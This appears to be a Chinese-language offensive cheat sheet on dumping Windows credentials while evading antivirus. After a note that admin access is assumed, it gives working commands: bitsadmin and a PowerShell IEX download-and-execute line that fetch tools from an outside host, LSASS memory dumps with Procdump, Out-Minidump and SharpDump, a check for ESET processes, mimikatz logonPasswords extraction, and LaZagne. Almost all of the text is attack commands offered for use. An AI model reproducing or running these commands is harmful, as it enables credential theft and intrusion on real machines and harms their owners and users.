免杀抓取明文

1、前提条件

必须已经事先拿到目标机器的管理权限,且看到有管理员的登录会话

query user

2、Prodump

直接指定 lsass.exe 进程名进行抓取即可,之后只需把生成的 lsass.dmp 文件拖回本地

cd c:\Windows\Temp

bitsadmin /rawreturn /transfer getfile https://raw.githubusercontent.com/klionsec/CommonTools/master/procdump.exe c:\windows\temp\dump.exe

dump.exe -accepteula -ma lsass.exe lsass.dmp

接着,再在本地用 mimikatz.exe 去加载读取即可[版本保持一致]

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

3、powershell

1、远程执行:

只适用于 2008r2 之后的系统

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/klionsec/CommonTools/master/Out-Minidump.ps1'); Get-Process lsass | Out-Minidump -DumpFilePath c:\windows\temp"

tasklist | findstr /c:"egui.exe" /c:"ekrn.exe"

dir c:\windows\Temp | findstr "lsass

同样,之后只需把 lsass_504.dmp 文件拖到本地机器再用 mimikatz.exe 加载读取即可

mimikatz.exe "sekurlsa::minidump lsass_596.dmp" "sekurlsa::logonPasswords full" exit

2、本地执行

powershell –exec bypass –Command "& {Import-Module 'C:\Tools\Out-Minidump.ps1'; Get-Process lsass | Out-Minidump -DumpFilePath c:\windows\temp}"

PS: powershell 导 lsass.exe 进程数据差不多文件要比用 prodump 导的小 10M 左右

mimikatz.exe "sekurlsa::minidump lsass_596.dmp" "sekurlsa::logonPasswords full" exit

4、sharpDump

项目地址:https://github.com/GhostPack/SharpDump

将.sln用MSBuild编译成.exe

%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe E:\SharpDump-master\SharpDump.sln /t:Rebuild /p:Configuration=Release

直接运行:

需要线把 bin 重命名为 zip 后缀,然后正常解压出里面的 文件,再给 mimikatz 去读取即可

mimikatz.exe "sekurlsa::minidump debug596" "sekurlsa::logonPasswords full" "exit"

5、LaZagne(python)

项目地址:https://github.com/AlessandroZ/LaZagne/releases

下载直接运行lazgne.exe all

最后更新于